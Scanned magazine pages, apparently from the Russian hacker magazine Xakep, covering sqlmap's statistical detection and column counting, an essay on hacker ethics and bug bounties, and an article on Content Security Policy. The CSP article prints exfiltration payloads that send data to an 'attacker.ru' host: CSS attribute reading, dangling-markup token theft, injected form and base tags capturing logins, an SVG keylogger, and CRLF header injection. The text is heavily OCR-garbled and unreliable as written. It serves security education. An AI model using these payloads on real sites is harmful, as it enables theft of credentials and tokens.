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Подбор количества полей с помощью ОКРЕК ВѴ условия 




Подбор количества полей с помощью ІШІОМ АЫ.5ЕІ.ЕСТ 



Зцітар использует математическую статисти- 
ку, чтобы отличить Ігие от Таізе ответов. В начале 
запуска программа изучает, что «нормально», 
а что нет. Время ответа обычных запросов и не- 
сущих боевую нагрузку, не использующую меха- 
низм задержки {например, Ьооіеап-Ьазес! слепой 
метод), записываются как нормальные и собира- 
ются для дальнейшей обработки. В случае если 
есть необходимость собрать их побольше, дела- 
ется еще пара фиктивных запросов. 

Когда нужно сделать заключение, была за- 
держка или нет, рассчитывается колоколообраз- 
ная кривая (Гаусса) нормального распределения. 
Все, что нормально (то есть не намеренно затя- 
нуто), должно располагаться под кривой с высо- 
кой вероятностью. Точнее, если задержка имеет 
значение меньше, чем значение верхней границы 
м(Т) + 7о(Т),гдер — среднее значение, а а пред- 
ставляет собой стандартное отклонение времени 
отклика, вероятность того, что мы наблюдаем 
нормальный ответ, 99,99%. 



Чем уже колоколообразная кривая, тем луч- 
ше. В случае значительной задержки в сети более 
высокие значения задержки (если применимы) 
будут необходимы, чтобы использоваться для вы- 
полнения уравнения, так как мы хотим выйти 
за пределы «нормальности». Если мы сможем это 
сделать, то будем способны различать с высокой 
точностью, где есть задержка, а где ее нет. 

Зяітар автоматически вычисляет параметры 
гауссовой колоколообразной кривой и сравни- 
вает со временем ответов. Если есть признаки 
значительной задержки сети, программа пред- 
упреждает пользователя, чтобы он использовал 
настолько высокое значение задержки {если это 
применимо), насколько это возможно. Кроме 
того, с другой стороны, в случае если исполь- 
зуемое значение задержки существенно выше, 
чем указанное верхнее значение границы, зцітар 
автоматически оптимизирует значение задержки 
до более подходящей, что сократит время пере- 
бора. 



ПОИСК КОЛИЧЕСТВА ПОЛ ЕЙ В ЗАПРОСЕ 

Чтобы успешно использовать ІІКІЮМ-технику, 
нужно знать число полей, участвующих в уязви- 
мом запросе. Основной метод — это исполь- 
зование условия ОРЮЕВ ВУ В случае если ответ 
для произвольно большого значения {например, 
ОКРЕ К ВУ 9143) резко отличается от нормально- 
го ответа, зріплар постарается выяснить количе- 
ство полей запроса с помощью адаптивного ал- 
горитма бинарного поиска. В нем пространство 
поиска разделено на большие отрезки {напри- 
мер, размером 10), последовательным образом 
определяется нужный отрезок, внутри которого 
задействуется классический алгоритм бинарного 
поиска. Поиск осуществляется до тех пор, пока 
не находится такое значение ІМ+1, которое имеет 
совершенно другой ответ по сравнению со значе- 
нием для N. В этом случае зцітар может с высо- 
кой вероятностью сделать вывод, что количество 
полей в уязвимом запросе равно N. 

Если метод ОПОЕВ ВУ неприменим, зцітар 
будет использовать подход, как при обнаружении 
задержки, Постоянное значение поля (например, 
N61.1.) будет использоваться в текущем отрезке 
поискового пространства в шюм ди 5Е1.ЕСТ вы- 
ражении, а ответы будут записываться. Если ответ 
на определенное количество полей, по сравнению 
с оригинальным ответом, выделяется из остальных 
статистическим образом, зцітар может с высокой 
вероятностью сделать вывод, что нашел нужное 
количество полей, участвующих в уязвимом запро- 
се. Так как результаты ответов с неверным количе- 
ством полей не будут значительно отличаться друг 
от друга, ответ с правильным количеством обя- 
зательно проявится в сравнении с ними {то есть 
он не будет подходить под колоколообразную кри- 
вую Гаусса). Если такого значения нет в текущем 
отрезке поиска (например, 1-10), здітар перейдет 
к другому, в зависимости от используемого уровня 
тестирования (опция --Іеѵеі). 

ЗАКЛЮЧЕНИЕ 

Видишь, сколько разнообразных техник было 
собрано в одной тулзе, чтобы максимально 
упростить нам жизнь. Недаром зцітар — очень 
популярный среди пентестеров всего земного 
шара инструмент для проверки веб-приложений 
на наличие уязвимостей ЗОЕ іп]есІіоп. Надеюсь, 
теперь, когда ты представляешь, как все устроено 
изнутри, ты сможешь использовать возможности 
программы на все 100%. ШЕ 
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Известный ѵФіІе Наі, докладчик на зесигііу- 
конференциях, соорганизатор ^егоМдІіІз 
и просто отличный парень. В данный момент 
занимает должность Ргіпсіраі Зесигііу 
Епдіпеег в компании Мокіа, где отвечает 
за безопасность сервисов платформы НЕВЕ. 
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НОВЫЕ КОРОЛЕВЫ ДРАМЫ 

В этот осенний день можно порассуждать о том, что есть «этич- 
ность» хакера в наше время. Да, тема не техническая, но важ- 
ная, ведь в первую очередь мы люди, а все остальное потом :). 
Ну и конечно же, все написанное — просто ІМНО и рефлексия. 



Н аверняка все слышали историю про очень «этичного» 
хакера из Палестины: он молодец, он потратил время 
и нашел вполне себе стандартную ошибку в РасеЬоок. 
Все бы хорошо, но он не смог толково написать ре- 
порт команде фейсбука, в результате чего получил ответ, что, 
мол, это не бага. Он попробовал еще раз и опять не смог объ- 
яснить. Бывает. Но нет, вместо того, чтобы написать еще одно 
письмо с подробным описанием угрозы, он начал демонстра- 
тивно использовать эту ЧУДОВИЩНО опасную уязвимость 
(постить на стене у любого пользователя, даже у не друга... ну 
ты понял, мы все умрем}, пытаясь поднять свое ЧСВ. 

Этично? Даже если фейсбук затупил, это не значит, что надо 
устраивать порнографию из-за примитивного бага, но нет: 
ЧСВ и жажда халявных денежек заставили выбить максималь- 
ный профит из ситуации. Особенно смешно, что в итоге со- 
общество бросилось защищать парня. Эта история лишний 
раз показывает, что планка ценностей сильно изменила свой 
уровень и ориентацию. 

КОГДА Я БЫЛ МОЛОД 

Во времена, когда свирепствовала 115 ШМІСОЭЕ и ѴѴіпЫике 
ООВ, я не думал об ИБ как индустрии, о том, что это может 
приносить деньги (легально или нет), пиар и прочее. В отли- 
чие от того, что мы имеем сейчас, рука закона не была сильна 
в интернете (и сейчас не во всех странах она сильна, но все 
же прогресс заметен). И в то время основной мотивацией 
была не жажда выгоды, а возможности, энтузиазм, цели и мо- 
ральные ценности. Если тебе хотелось кардить и ты считал, 
что воровать «электронные деньги» — это О К, то ты это делал. 
Кого-то ловили, но большинство нет. Если считал, что дампить 
пароли от сііаі-ир, используя незакрытые шары или ЗиЬЗеѵеп 
с ВаскОгіТісе, — это О К, то ты это делал. Особенно учитывая, 
что дампить пароли можно было не у соседа, а, например, 
в США, у пользователей с «роумингом», и использовать эти 
данные в Питере, имея локальный номер пула х25 какого-ни- 
будь «Спринта». То же самое с популярной дефейс-сценой. 



Команды конкурировали друг с другом за количество дефей- 
сов, за популярность взломанного ресурса и даже за красоту 
и стиль :). 

Причины были разные: политика, фан, выгода, кто-то добы- 
вал деньги — спамом, продажей виагры и викодина, внедряя 
баннеры партнерки на взломанные ресурсы. Технически мир 
не сильно изменился. Да, некоторые умники говорят, что вот 
тут кибервойна и АРТ. Но те же АРТ и операции под заказ ка- 
кого-либо государства выполнялись и тогда, хотя их размах 
и влияние были несколько меньше уровнем. Но в остальном 
было все то, что есть и сейчас, — вирусы, трояны, эксплойты. 
Зато в этике изменения гораздо более заметны. Изменилось 
само понятие, и интерпретация стала крайне гибкой. 

ЧТО ПОМЕНЯЛОСЬ? 

Когда что-то становится популярным и востребованным, 
то возникает нехватка кадров и при этом снижается входной 
порог. Открываются двери для тех, кто ведется на моду, кажу- 
щуюся простоту дела, высокие доходы. И тут начинаются ин- 
тересные вещи. 

Возьмем классику: сделать дефейс с красивой картинкой 
и вежливым текстом, мол, админ, напортачил ты тут, так что вот 
тебе картинка на главной странице, ноты не волнуйся, мы бэкап 
іпсіех.біті сделали, а вот тебе мой етаіі, пиши, скажу, в чем бага 
была (или сам по логам смотри)! Раньше такой ход в отношении 
мелкого сайта для узкого круга посетителей был... хмм... почти 
этичным и красивым ходом, с примесью романтизма. 

Где тут этика? Только в поведении: если это мелкий биз- 
нес или персональный проект, то никакого ущерба репутации 
и прочих рисков нет. Да даже если это банк — только СІЗО 
и консультанты И Б верят, что от дефейса страницы банка бу- 
дет ущерб репутации. Если и будет, то маленький и недолгий. 
Посмотрите на громкие взломы — Зкуре, ЫпкесІІп и многие 
другие. Это уже не просто дефейс, и ущерб для таких компаний 
более чувствителен, ведь затрагивает всех пользователей сра- 
зу. И что? Абсолютно ничего. Ерунда эта ваша ИБ! 
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Именно крупные СМИ создают шум 




Алекс Сотиров и Дино 
Дай Зови говорят: 
писать эксплойты 
и искать уязви мости — 
это трудозатратная, 
дорогая работа 
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Но консультантов, менеджеров и СІ50 понять можно — им 
нужна работа, а значит, надо сеять страх и продавать услу- 
ги. И многие начинают тупо врать и даже не хотят понимать, 
что это преувеличенная «не совсем правда». Многие доклады, 
даже с ВІаск Нас, многие отчеты об уязвимостях и «исследо- 
вания» очень и очень преувеличены и раздуты. 

Но почему я заговорил об этом? Найти проблему и опи- 
сать ее — это нормально, но начинать поднимать шум ради 
рекламы — уже нет. И это тенденция. Мне часто приходят ре- 
порты об уязвимостях и возможных атаках типа Х53/СЗНР/ 
СІісЫаскіпд, в которых так называемые «этичные» хакеры 
говорят, что это МЕОА_иИВА_НЮН_СНГПСА!_ ОѴѴАЗР ТОР- 
10 уязвимость, и страшно довольны :}. После того как их до- 
бавят на стену славы, они начинают устраиваться на работу, 
подавая эти «стены славы» как пруф, что они мегакруты. Это 
к вопросу о пороге вхождения. Если раньше хакеры вылупля- 
лись из программистов и админов, людей, которые понима- 
ли, как можно использовать систему, программу нестандар- 
тно, то теперь рулит шаблонизация: вставь кавычку, напиши 
аІеП{1 ). А это уже немного не то... 

ЫОМОПЕРЯЕЕВЦС5 

Я понимаю, что за работу надо платить, но именно тут и за- 
рыта странная собака: многие не просят никого искать баги, 
то есть, выполняя добровольную работу, что-то за нее тре- 
бовать и искать уважения за умение вставлять кавычки — это 
неэтично :). Уважение и респекты ресерчер получает не за то, 
что нашел, куда впихнуть кавычку, а за то, что с чистой душой 
сдал ее вендору, потому что не хочет, чтобы этот проект был 
дырявым. Многие вендоры поощряют этот подход через Вид 
Воип!у программы, но ценится именно не рыночное отно- 
шение, а человеческое и то, что обе стороны могут получить 
профит и остаться друзьями. Например, самый популярный 
коммент в блогах на тему недовольства поведением вендо- 
ра — «Лучше бы на черном рынке продал!» Ну что ж, о какой 
этичности тут речь... Умеешь искать уязвимости и хочешь 



за это деньги — иди в «эксперты по анализу защищенности 
веб-приложений на наличие Х53». Кроме того, те же баг ба- 
унти: читай оферту — ты знаешь, что тебя ждет, и, даже если 
вендор залажал или не понял тебя {всякое может случить- 
ся), постарайся быть человеком, а не строить наивные выво- 
ды о мнимых причинах возникшей проблемы :). 

Совсем по-другому обстоит дело на рынке 0-Рау для бра- 
узеров и прочих клиент-сайд-плагинов. Там создать боевой 
эксплойт достаточно трудоемко, и все меньше и меньше лю- 
дей делают это ради фана и идеи. Учитывая популяризацию 
«производства кибероружия», такая работа становится дей- 
ствительно высокооплачиваемой, и ни о какой этике речь 
уже не идет — это бизнес. Хотя и тут есть люди, которые 
просто могут найти уязвимость, не тратя силы на эксплойт, 
помочь вендору закрыть проблему ради просто человече- 
ского отношения. Но тут и вендорам надо понимать: игно- 
рировать проблему уязвимостей в их продукте или надеять- 
ся на халяву от людей, которые потратили силы и сделали 
работу, — неэтично. Если человек создал эксплойт под ваш 
продукт — он может им распорядиться по-своему. Именно 
поэтому многие и делают Вид Воипіу программы: даже по- 
иск тупых Х55 — это какая-никакая, но работа, и люди до- 
стойны как минимум благодарности за то, что помогли сни- 
зить процент ваших косяков и в продакшне. 

ЗАЧЕМ Я ВСЕ ЭТО ПИСАЛ? 

Если вынести за скобки проблему творческого кризиса, 
писал я это потому, что эту тему принято считать мелкой, 
не технической, очевидной. Но не хотелось бы, чтобы 
уровень адекватности падал. К сожалению, чем популяр- 
нее тема ИБ, тем это чаще происходит. Я понимаю, ныть 
не дело, но если реально оценивать хотя бы себя и свою 
работу и сопоставить это со своими этическими нормами 
и с тем, что происходит вокруг, то можно понять нечто по- 
лезное и как-то себя улучшить. Вот этого я нам всем и же- 
лаю! НЕ 



Хакер номер один , 
создал свою фирму, 
регулярный гость СЫМ 
и всяких там газет 
и журналов. Да, это 
вершина неэтичности 
в ИБ-индустрии. И хотя 
все ИБ-компании 
грешат буллшит-ПР, 
но до этого дяди им 
совесть не дает пока 
опуститься 
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Обзор нового веб-стандарта 
и его фундаментальных уязвимостей 

Чтобы идти в ногу со временем, браузеры внедряют все новые технологии для обеспечения 
безопасности пользователей. Одна из них — Сопіепі: Зесигііу Роіісу, позволяющая разработ- 
чикам сайтов четко объяснить браузеру, на какие адреса тот может выполнять межсайтовые 
запросы. Однако новый веб-стандарт страдает от существенных недостатков, ставящих под 
сомнение его пригодность как защиты отХЗЗ. 



СОГІТЕПТ5ЕС1Ш1ТѴ РОЫСѴѴЗ ЗАМЕ ОШСШ РОЫСѴ 

Одним из главных принципов безопасности браузеров и веба 
в целом является $ате Огідіп Роіісу — дословно «политика 
единого источника» (устоявшегося термина до сих пор не су- 
ществует). Ее суть заключается в проверке трех компонентов, 
из которых состоит огідіп: протокол, хост и порт. Если страница 
ІШр://1ез11 .ги/а.ІИгпІ пытается получить доступ к йОМ страни- 
цы И11р;/Лез12.ги/Ь.б1т1, то у нее ничего не выйдет, так как хо- 
сты отличаются. Если бы 50Р не существовал, любой сайт мог 
бы делать запросы на произвольные адреса и получать оттуда 
данные, что, как подсказывает логика, не есть хорошо. Причем 
страдали бы все: как пользователи, чьи персональные данные 
летали бы без принуждения, так и владельцы ресурсов, — в об- 
щем, в вебах творился бы полный хаос. Поэтому 5ате Огідіп 
Роіісу всех спасает, и все счастливы. Однако есть одно но: что, 
если на страницу МНр://1е511 .ги/а.ілігпі внедрен злой скрипт 
с сайта Н11р://1ез12.ш/, который делает плохие штуки в контек- 
сте браузера жертвы? В данном случае ЗОР бесполезен, ибо 
на кзсгірб 5гс=". . ."> политика не распространяется. Что же 
делать? 

СЗР ДЛЯ ВСЕХ 

На помощь приходит новый стандарт — Сопіепі Зесигіііу Роіісу, 
основное предназначение которого состоит в том, чтобы за- 
щитить пользователя от угроз межсайтового выполнения сце- 
нариев. Изначальный вариант спецификации был разработан 
в МогіІІа Роипсіаііоп. Первым браузером с поддержкой С5Р стал 
Рігеіох 4.0, который вышел в марте 2011 года. С конца 2012 года 
С5Р 1 .0 находится в\Л/ЗС на стадии принятия как веб-стандарта. 
На данный момент разрабатывается спецификация С5Р 1.1. 
Согласно статистике сайта зіаісоипіег.сот, на момент написа- 
ния статьи полную поддержку Сопіепі Зесигііу Роіісу имели бо- 
лее 60% браузеров по всему миру. 

Флагманами выступают Рігеіох и СИготе, которые раньше 
всех внедрили реализацию СЗР в качестве экспериментальной 
фичи и с недавнего времени перешли на полную поддержку. 
В техническом плане это означает, что директивы СЗР помеща- 
лись во временный НТТР-заголовок с префиксом (Х-Сопіепі- 
Зесигііу-Роіісу в Рігеіох и Х-ѴѴеЬКіІ-СЗР в Сбготе), а сейчас 



используется стандартный заголовок (Сопіепі-Зесигііу- Роіісу). 
В Іпіегпеі Ехріогег по традиции все печально: СЗР работает 
только с версии 10.0 и в очень урезанном виде. 

КАК РАБОТАЕТ С8Р 

Главный смысл СЗР в том, чтобы позволить разработчикам 
сайтов в явном виде объявить белый список источников, отку- 
да могут быть загружены данные для разных типов ресурсов. 
Принцип «что не разрешено, то запрещено» позволяет сни- 
зить риск обхода политики. СЗР дает возможность определить 
разрешенные списки с помощью следующих директив: зсгірі- 
згс, Іопі-згс, Ігапле-згс, ітд-згс, тесііа-згс, обіесі-згс, зіуіе-згс. 
Как нетрудно догадаться, зсгірі-згс задает вайт-лист значений 
для атрибута зге тега <5сгір1:>, Ігате-згс — тега <Ргаіге>, тебіа- 
зге <ѵіс!ео> и <ашИо> и так далее. Кроме того, есть директива 
беіаиіі-зге, которая имеет силу, когда директива для конкретно- 
го типа ресурса не объявлена. 

Имеется четыре ключевых слова, которые, помимо ІІНІ_, мо- 
гут быть использованы в качестве источника: 

• зеіі означает текущий огідіп {протокол, хост, порт); 

■ попе — запрещает все; 

• ипзаіе-іпііпе — разрешает использование «инлайн» 63- 
скриптов, то есть кода в теге <зсгірі:> прямо на странице; 
также имеет аналогичное значение для тега <5Туіе> и С55- 
свойств; 

• ипзаіе-еѵаі — разрешает выполнение 6аѵа5сгір1-кода 
как строки с помощью функций еѵаі, зеІТітеоиІ и зеііпіегѵаі. 

Помимо прочего, могут использоваться вайлдкарды для лю- 
бой части ІІПІ_, например *://1:е5Т.ги:* применяет политику 
для хоста іезі.ги с любым протоколом и портом. 

Чтобы лучше понять, как работает СЗР, рассмотрим такой 
пример. Страница МНр://1ез1.ги/а.Іі1тІ задает следующую по- 
литику с помощью НИР- заголовка (также возможно использо- 
вать тег <те1:а>): 

НТ ТР/1.0 200 0К 

бе^аиН -з гс ' 5е 1~Р ' ; <-■ 

5сгір1>5гс ііббрт//сбп Л:е5І: лш ІтЕТ р: // аіах,<-> 




Арсений Реутов 



Тест С5Р в СИ го те 28 

Мобильный ТѵѵіМег 
одним из первых стал Соп'1:епТ^-5еси^:і.■1:у-Ро1ісу^ 

использовать С5Р 




Сопіепі Зесигііу Роіісу 1.0 

ІЪіз іезі сИескв уоиг Ьгои/зег зиррогі іо г №е Сопіепі 8есигіГу Роіісу (СЭР), 



Кип Іезіз 



ДІ5І ІѲ5І5 



Кезиііз: (174/187) 

Ігі ТШе 

0 Ьоай зіуіезвееі (гот (МаиИ-згс зеІГ 

1 Іоай зіуіезйееі (гот аеіаиіі-зге 'попе 1 

2 Іоай зІуІезИее! (гот зіуіе-зге 'зеІГ 

3 Іоаб зІуІезИее! (гот зіуіе-зге 'попе' 
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^оо^1еарІ5 . сот: і т%-5гс Ьі^р : //ссіп .±е5±. ги : <-> 

5±уіе-5гс ІтЬ~Ьр: /7ссІп.Ее5±. ги 

Сог гЬепі-І.е п%1і Іі: 4242 

СоппесЕіоп: сіозе 




</зсгір1:> 

< 5 с г ірі: > 

а1егЕ( т 'по~Е а Понес!").: 

< / ЗСГІрІІ > 



В данном случае С5Р разрешает выполнение скриптов толь- 
ко с хостов ссІп.іезГги и аіах.доодіеаріз.сот, загрузку изобра- 
жений и стилей — с ссІпЛезЕги, для остальных типов ресурсов 
определен кейворд зеІТ, например отправка Аидх-запросов 
(соппесі-згс) разрешена только на текущий огідіп. 

Если атакующий имеет Х38 и попытается вставить скрипт 
со своего сайта, то браузер заблокирует его выполнение и вы- 
ведет в консоль сообщение следующего вида: 

РеЕцзесІ Іо ІоасІ ІИе а сгірі ' ІтНр : //аНаскег . ги /<-> 
Х55 ^'5 ' _Ьесаизе іі: ѵіоІа'Ьез ІФе _Ео11оміп§ Соп^еп'Ь 
БесигИу Роіісу гіігес^іѵе^ "5сгір1>5гс ІгН р: //сс!п .<-< 
^ез^.ьГи Ь1:1: р:// аі ах.§оод1еарі5 . сот” . 

А теперь, когда кажется, что все прекрасно, самое время по- 
говорить об ограничениях С5Р, которые могут привести к обхо- 
ду политики. 

ОГРАНИЧЕНИЯ С5Р 

С позиции веб- разработчика правильно и грамотно развер- 
нуть СЗР на своем ресурсе довольно проблематично, так 
как для каждой страницы необходимо устанавливать отдельную 
политику. В настройке СЗР ему может помочь такая директива, 
как героіі-игі, с помощью которой он может получать от браузе- 
ра информацию о всех нарушениях политики. Отчет о наруше- 
нии СЗР может выглядеть следующим образом: 



ѵѵ\ѵ\ѵ 

Отличный вводный 
материал по СЗР: 
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Таблица совместимости 
СЗР в различных браузе- 



Исследование зсгірііезз- 
атак от Марио Хайдери- 



Статья по зсгірііезз- 
техникамотМихала 
Залевски: із.аеІ/ІіРгЭаТ 



Демо и презентации 
поСЗЗ-атакам: 



{ 

" с зр- ге рогі:" : { 

"сІоситепТ:-ипі ,, ^_ "ІгИ р : // Іезі: ._ги/а . І тЕтІ " . 

"ге-Реггег” : "Ьіір: //іеаі: . ги/" . 

" Ь1оскесі-игі"і_ "ІтЬір: / /аііаск ег. ги/хзз . ] 5 " . 

"ѵіоіаііесі-сіігесіііѵе" : "зспір'б-зпс ітЬірі//сфп_^ч-» 

Іе_5іл:и Ы:1:р: / /а^ах.^оовіеаріз - сот” . 

"огі§іпа1-ро1ісу" : "зсгіріі-згс ІгЫір : //сФп . ііезі: . • 

ги ІгНр://азах.§оо8Іеарі5 . сот; герогі-игі «-< 

/с5р_герогі:_раг5еп" 

-1 

} 



Получая отчеты, разработчик решает, какие источники нуж- 
но разрешить, и соответствующим образом обновляет полити- 
ку — вручную либо с помощью специальных средств. Например, 
для НиЬу есть дет от компании ТѵѵіНег — зесигеілеабегз (Іійрз:// 
аШтиЬ.сот/ТѵѵІТТег/десигеРеадегБ ). позволяющий не только на- 
строить СЗР, но и установить другие модные заголовки, вроде 
Х-Х3$-Рго1есііоп, Х-СопТепі-Туре-ОрТіопз и другие. 

Все бы хорошо, но почти в 100% случаев разработчик стол- 
кнется с проблемой инлайн-скриптов. Дело в том, что СЗР 1.0 
может либо полностью разрешить их, либо запретить, третьего 
не дано. Стандарт рассматривает инлайн-скрипты как боль- 
шое зло, однако полностью отказаться от них в угоду СЗР 
на обычном сайте, на котором заранее не планировалось раз- 
ворачивать СЗР, едва ли удастся. Поэтому, указав в зсгірі-згс 
’ипзаів-іпііпе’, разработчик автоматически открывает все двери 
для атакующего. 

В разрабатываемой на данный момент спецификации 
СЗР 1 . 1 есть частичное решение для этой проблемы — директи- 
ва зсгіріі-попсе, которая позволяет задать некое уникальное зна- 
чение-токен для всех разрешенных скриптов. Таким образом, 
блокируются не все инлайн-скрипты, а только неизвестные: 

к: 

<5СГІрЕ попсе=”9ссН : Ь439с787бе703е307864с9167а15" > НарушениеСБРвкон- 
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Очевидно, что такой подход не поможет защититься от слу- 
чаев, когда у атакующего есть возможность внедрить код 
в скрипт с валидным токеном. Кроме того, есть масса вариан- 
тов обхода, о чем пойдет речь ниже. 

СШ.ГІІШЕСТІОМ 

При наличии СНІ_Р-инъекции в заголовках ответа, то есть от- 
сутствии фильтрации символа переноса строки, у атакующего 
есть возможность банального обхода СЗР с помощью внедре- 
ния собственных директив. Здесь большую роль играет то, 
какой заголовок браузер будет использовать при наличии не- 
скольких с одинаковым именем. Как в случае с НТТР Рагатеіег 
РоІІіДіоп, где одинаковые имена параметров обрабатываются 
по-разному на разных платформах, при внедрении еще одного 
заголовка Сопіепі-Зесигііу-Роіісу важно, где он окажется — пе- 
ред первоначальным или после него, так как один браузер мо- 
жет взять последний заголовок, а другой — первый, Так, если 
браузер отдает приоритет первому и мы внедряем наш СЗР 
перед настоящим, то обход тривиален: 

НТТР/ 1.1 20Ѳ СЖ 
5еТ-Соокіе : 1ап§иа§е=ги; 

СопЕепЕ-БесигіІіу-Роііс у : зс гірт -згс <-■ 

' ипьа-ре-іпііпе ' * 

СопЕепЕ-БесигіЕу-РоНсу : йІеЕаиІІі-згс 'БеІТ' 

Если же используется последний встреченный заголовок, 
то мы можем отправить его в тело страницы, отправив \г\п\г\п: 

ги;Дг\пСоп'ЬепТ-5есигі'і:у^Ро1іс}С_ зсгірі-згс _«=< 

1 ипзаТе-іпІіпе ' *\г\п\г\п 

На выходе получим: 

НТТР/1,1 20Ѳ 0К 
5еТ-Соокіе: 1ап§;иа§е=гиі 
СопТепТ-ЗесигіТу-РоІісу : зспірТ-згс <-■ 

' ипза-ре-іпііпе ' * 

СопТепТ-БесигіТу-РоІісу : сІе-РаиІТ-згс ’.зеі-р ' 



Таким образом, первоначальный заголовок попадет в со- 
держание НТТР-ответа и не будет иметь силы. 

$С Ш РТІ. Е38 АТТАС КЗ 

Перейдем к более интересным вариантам обхода — на стороне 
клиента. Основная цель межсайтового скриптинга — получить 
приватную информацию пользователя, которая обычно хра- 
нится в соокіе. Однако с введением таких мер защиты, как флаг 
ШрОпІу, запрещающий из-скриптам доступ к защищаемым 
соокіе, внедрением в браузеры ХЗЗ-фильтров (Х55 Аисіііог 
в СІіготе, ХЗЗЕіЦег в ІЕ), собственно и самого СЗР, исследовате- 
ли безопасности все чаще обращают внимание на другие цели, 
например личные данные, различного рода токены (СЭРЕ, оАиФ, 
в скором будущем и зсгірі- попсе). При этом используются новые 
способы отправки данных на сторонние сайты, без ^ѵаЗсгірІ! 

С55АП 

Еще в 2008 году Эдуардо Вела (Ебиагбо Ѵеіа), Дэвид Линд- 
сей (йаѵісі Ыпсізау) и Гарет Хейес (Ѳагейі Неуез) представили 
технику чтения атрибутов тегов с помощью СЗЗ-селекторов. 
На данный момент техника все так же актуальна. Если рань- 
ше она позиционировалась как обход ИоЗсгірІ, то сейчас ее 
можно использовать и для СЗР. Суть С53АН (СЗЗ АШіЬиІе 
Веасііпд) в брутфорсе значений с помощью селекторов атрибу- 
тов. Для этого на уязвимую страницу подключается СЗЗ-файл 
с комбинациями выражений: 

Іпри1:ѵа1ие л =а ( {Ьаск^гоипсІ 
и г1(Ы :фр: / /а~Ы:аскег . ги/?а)} 
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Если значение целевого инпута начинается с «а», то будет 
отправлен запрос на сайт атакующего через подгрузку фоново- С35ДН в действии 

го изображения, относящегося к соответствующей комбинации 
символов. С53 не имеет возможности указать позицию симво- 
ла, поэтому для получения следующего знака необходимо сге- Кейлоггер без строчки 

нерировать массу вариантов вида из 

Іпри1:ѵа 1ие л =аа { {Ьаск^гоигісІ:*-» 

иг1(ФТЕр:// а - Е , Са скег. ги/?а а)} 



Поэтому конечный РоС может иметь объем в несколько сотен 
килобайтов. 

Р08ТСАП08 РВОМ Р08Т-Х88 ОТОПЮ 

Интересные идеи предложил Михал Залевски (Місйа! 2аІе\ѵзкі). 
Например, имея внедрение кода перед формой, защищенной 
СЗПР-токеном, можно вставить незакрытый тег ітд: 

<іте 5гс="ІтЫ:р: //а^Таскег . ги?с= 

Все содержание страницы до следующей закрывающей ка- 
вычки, включая и целевой токен, после незакрытого атрибута 
зге будет отправлено на сайт атакующего. 

Другой вектор — использование тега <Техі:агеа>, который 
работает как СО АТА в ХМІ_. Внутри іехіагеа допускаются любые 
символы, однако в отличие от предыдущего способа отправить 
полное содержание страницы можно только при участии поль- 
зователя, который должен самостоятельно отправить форму. 

Еще один способ использует тот факт, что формы не могут 
быть вложенными, поэтому внедрение незакрытого тега <1огт> 
перед целевой формой позволяет перенаправить ее данные 
на хост атакующего: 

<Тогт асбіопн-' Іг ЕТр: //аТТаскег . ги/1о§. р Ьр ' > 

♦ * * 

<Гогт асТіоп= ' Іо^іп .рНр ' > 

кіприі; бу ре = 'Чехѣ " пате= "І0%іп"> 

<іприб буре= м ра55ы огсІ’ 1 п ате="ра5 5ыо гс1"> 

</-Рогт> 

Аналогичного результата можно достичь при помощи век- 
тора с использованием тега <Ьазе>, который определяет ІІВІ_ 
для всех относительных путей на странице. Согласно стандар- 
ту, тег должен быть включен внутри <беаб>, однако большин- 
ство браузеров допускают использование тега в любом месте: 

<Ьазе МгеГ= 1 ІтЕб р :// аббаскег . ги/ 1 > 

Ь 4 * 

<То гт асбіоп= ' Іо^іп.рКір ' > 

<іприб Туре^ТехТ" пате^' 1о§іп'^> 

<іприб бу ре= м ра55ИогсІ 1 ' п а те="ра55ыогсІ" > 

</Гогт> 

8ѴС-КЕЙЛОГГЕР 

Не менее интересные способы отправки личных данных 
на сторонние сайты в обход СЗР можно встретить в исследо- 



ваниях Марио Хайдериха (Магіо Неібепсіі), Один из них играет 
роль настоящего кейлоггера при помощи тегов <зѵд> и <зеІ>. 
Официальная и документированная ѴѴЗС-фича ассеззКеу 
внутри <зе1> позволяет привязать нажатия клавиш к иниции- 
рованию НТТР-запросов — идеально для реализации кейлог- 
гера, причем без использования 33! Внедрив следующий код 
на страницу с формой авторизации, можно перехватить нажа- 
тия клавиш пользователя и, соответственно, логин и пароль: 

<зѵ§ ЬеіёЬб="Ѳрх" > 

< ішаёе хт1п5 :х!іпк=" Нбб р : / /ѵіш . ог§/ 1999/хІіп к" 
хііпк :_Рігеб="попе" > 

<зеб аббгіЬибеМате=”х1іпк_: Мгеб" 

Ье§іп="ассе55Кеу(а) " б о="//аббас к ег . ги/?а " /> 

<зеб аТТгіЬиТе№те="х1іпк : НгеТ" ±± 
Ье§іп="ассе55Кеу(Ь)’' бо="//аббаске г . ги/? Ь" /> 

<зеб аббгіЬибеМате="х1іпк_: Нгеб" ^ 
Ьееіп="ассез5Кеу(с)" бо="//аббаскег. ги/?с" /> 

* *• 

</іта§е> 

</5Ѵ§> 

ЧТЕНИЕ АТРИБУТОВ С ПОМОЩЬЮ... СКРОЛЛ БАРОВ 

Пожалуй, самая интересная зегірііезз-атака в обход СЗР — чте- 
ние атрибутов с помощью СЗЗ, ЗѴО и скроллбаров в ѴѴеЬКіб 
от того же Марио Хайдериха, Один из принципов атаки ана- 
логичен С53АВ — с помощью СЗЗ -селекторов содержание 
атрибута можно выразить через РОМ, но уже селектором :айег 
с СЗЗ- выражением вида сопіепі: аЧг(бгеІ) (для ссылок). Даль- 
ше интересней — для каждого такого элемента с содержани- 
ем атрибута можно присвоить ЗѴѲ-шрифт. В шрифте имеется 
лишь один символ, таким образом, остальные символы в целе- 
вом атрибуте не будут иметь физического размера на странице. 
Если «сжать» значение, то с помощью скроллбаров можно вы- 
яснить, какой символ содержится в значении, используя специ- 
альный селектор для указания фонового изображения при по- 
явлении скроллбара: 

еііѵ.а: : -меЬкіб-зсгоІІЬаг-бгаск- 

ріесе : ѵегбісаі : іпспетепб { 

Ьаск§гоипсІ: гесі иг1(/А); 

} 



Техника позволяет извлекать СЗНР-токены за меньшее ко- 
личество запросов и с помощью меньшего по размеру эксплой- 
та, нежели СЗЗАН. Демо смотри здесь: лТ Іѵ/зЬ2Нт1 . 

РШ 

Сопіеп! Зесигііу Роіісу — большой шаг в сторону более без- 
опасного веба. В перспективе веб-стандарт может серьезно 
повлиять на клиент-сайд атаки как класс. Если сейчас на боль- 
шинстве уязвимых к ХЗЗ сайтам угнать куки можно обычными 
иЗ-векторами, то в будущем с распространением СЗР в мас- 
сы все будет не так просто. А это подтолкнет исследователей 
к еще более изощренным техникам, нацеленным на уязвимости 
в особенностях реализации СЗР в конкретных браузерах. ЗС 









